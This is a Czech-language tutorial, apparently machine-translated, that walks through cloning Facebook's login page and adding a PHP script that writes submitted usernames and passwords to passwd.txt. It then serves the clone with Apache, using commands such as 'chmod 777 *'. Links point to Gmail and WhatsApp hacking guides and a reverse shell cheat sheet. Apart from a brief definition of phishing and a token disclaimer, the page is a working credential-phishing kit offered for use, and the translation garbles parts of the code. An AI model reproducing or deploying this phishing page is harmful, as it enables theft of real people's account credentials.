co je Phishing Attack?
Phishing je druh útoku sociálního inženýrství. Tento útok hacker vytvoří falešnou stránku účtu sociálních médií, jako je Facebook, Instagram a další, ale mají rádi skutečné účty a dělají sociální inženýrství cíle a poté cíl klikne na tento odkaz a vyplní přihlašovací údaje a čísla kreditních karet. etc na jejich účet je ohrožena hackerem.
Co Je Sociální Inženýrství?
sociální inženýrství je umění manipulovat s lidmi, aby se vzdali důvěrných informací. Typy informací, které tito zločinci hledají, se mohou lišit, ale když jsou jednotlivci zaměřeni na zločince, obvykle se vás snaží přimět, abyste jim dali svá hesla nebo bankovní informace,
nebo přistupovali k počítači a tajně instalovali škodlivý software–který jim poskytne přístup k vašim heslům a bankovním informacím a také jim dá kontrolu nad počítačem.
zločinci používají taktiku sociálního inženýrství, protože je obvykle snazší využít váš přirozený sklon k důvěře, než je objevovat způsoby, jak hacknout váš software. Například
je mnohem snazší oklamat někoho, aby vám dal své heslo, než je pro vás pokusit se hacknout jeho heslo (pokud heslo není opravdu slabé). ok, takže se podívejme, jak nainstalovat phishingový nástroj v termuxu a hackovat účty sociálních médií.
- Hiddeneye instalace v Termux
- použití FTK Imager forenzní nástroj
- Hack Gmail heslo Phishing 2021
- hack Facebook účet Facebook Phishing
- Whatsapp Hacking App 2021
Hack Facebook účet pomocí Phishing Page
Dnes jsem vám řekne, jak si můžete vytvořit Facebook Phishing stránky a jak hackeři hack něčí Facebook účet pomocí Facebook phishing stránky. pojďme otevřít původní stránku Facebook navigací URL stránky Facebook.
nejprve otevřete náš prohlížeč a poté přejděte na Facebook.com strana.Facebook facebook účet
po otevření stránky Facebook, potřebujeme Facebook zdrojový kód pojďme otevřít zdrojový kód existuje dvě možnosti čtení zdrojový kód pravým tlačítkem myši a klikněte na Zobrazit stránku zdrojový kód a druhý je klávesová zkratka stiskněte Ctrl + U.
Facebook zdrojový kód stránka se otevře v novém okně nyní zkopírujeme celý zdrojový kód Facebooku.
kopírovat zdrojový kód Facebook Page
po zkopírování zdrojového kódu musíme vytvořit soubor otevřít libovolný editor jsem použil leafpad a vložit celý zdroj do tohoto souboru.
1
|
leafpad
|
po vložení vypadá zdrojový kód Facebook takto. musíme najít řádek action = stiskněte CTRL + F, pokud používáte jiné editory, vaše klávesová zkratka je jiná a vyhledejte action=.
najděte řádek action= ve zdrojovém kódu.
poté, co jsme našli action = line zde vidíme další Facebook URL nejprve odstraníme přihlašovací URL pamatovat neodstraňujte druhý řádek. pokud něco omylem odstraníte, zkopírujte celý kód znovu a postup opakujte.
nyní musíme vytvořit další PHP soubor a zkopírovat PHP kód a vložit do nového souboru a pak uložit soubor můžete si vybrat libovolný název souboru.
1
2
3
4
5
6
7
8
9
10
11
12
13
|
<?php
záhlaví (‚umístění: facebook.com‘);
$handle = fopen(„passwd.txt“, „a“);
foreach ($_POST as $variable => $value) {
fwrite ($handle, $variable);
fwrite ($handle, „=“);
fwrite ($handle, $value);
fwrite ($handle, „\r\n“);
}
fwrite ($handle, „\r\n \ n \ n \ n“);
fclose ($handle);
exit;
?>
|
a znovu přejděte na zdroj Facebook a znovu vyhledejte action= a vložte nový název souboru PHP do dvojité nabídky, v mém případě je název souboru post.Linux.
a uložil index as.zdrojový soubor html Facebook.
Facebook účet-uložte soubor (Index.html) jméno.
po uložení souboru musíme vytvořit další soubor passwd.txt, proč potřebujeme vytvořit passwd.txt v tomto souboru jsme našli naše cílové uživatelské jméno a heslo.
Facebook účet-vytvořte Passwd.txt soubor.
1
|
echo “ > passwd.txt
|
po tomto procesu musíme přidat oprávnění pro všechny soubory ke spuštění příkazu chmod a všechna oprávnění ke čtení a zápisu.
přidání oprávnění všechny soubory
1
|
chmod 777 *
|
nyní spustíme náš místní server Apache pokud chcete přistupovat na stránku na internetu, potřebujete webhosting, nastavím phishingovou stránku Facebook na našem místním počítači.
1
|
služba apache2 start
|
náš server Apache je spuštěn nyní otevřete prohlížeč a přejděte na naši místní IP adresu. Po otevření stránky se zobrazí přihlašovací stránka Facebook, kde jsme vložili naše testovací uživatelské jméno a heslo, prosím, nedávejte zde své původní přihlašovací údaje.
po vyplnění e-mailu/telefonu a hesla se tato stránka přesměruje na původní stránku Facebook a naše testovací uživatelské jméno a heslo se uloží na passwd.txt soubor.
pojďme zkontrolovat passwd.txt soubor.
Poznámka: Nezapomeňte nepoužívejte tento proces k nezákonné činnosti, pokud zadáte své vlastní původní uživatelské jméno a heslo a váš účet je napaden, nejsem zodpovědný.
- MacChanger v Kali Linux
- typy penetračních testů
- Onion Website DarkWeb
- reverzní Shell Cheat Sheet
- Linux Lostat Command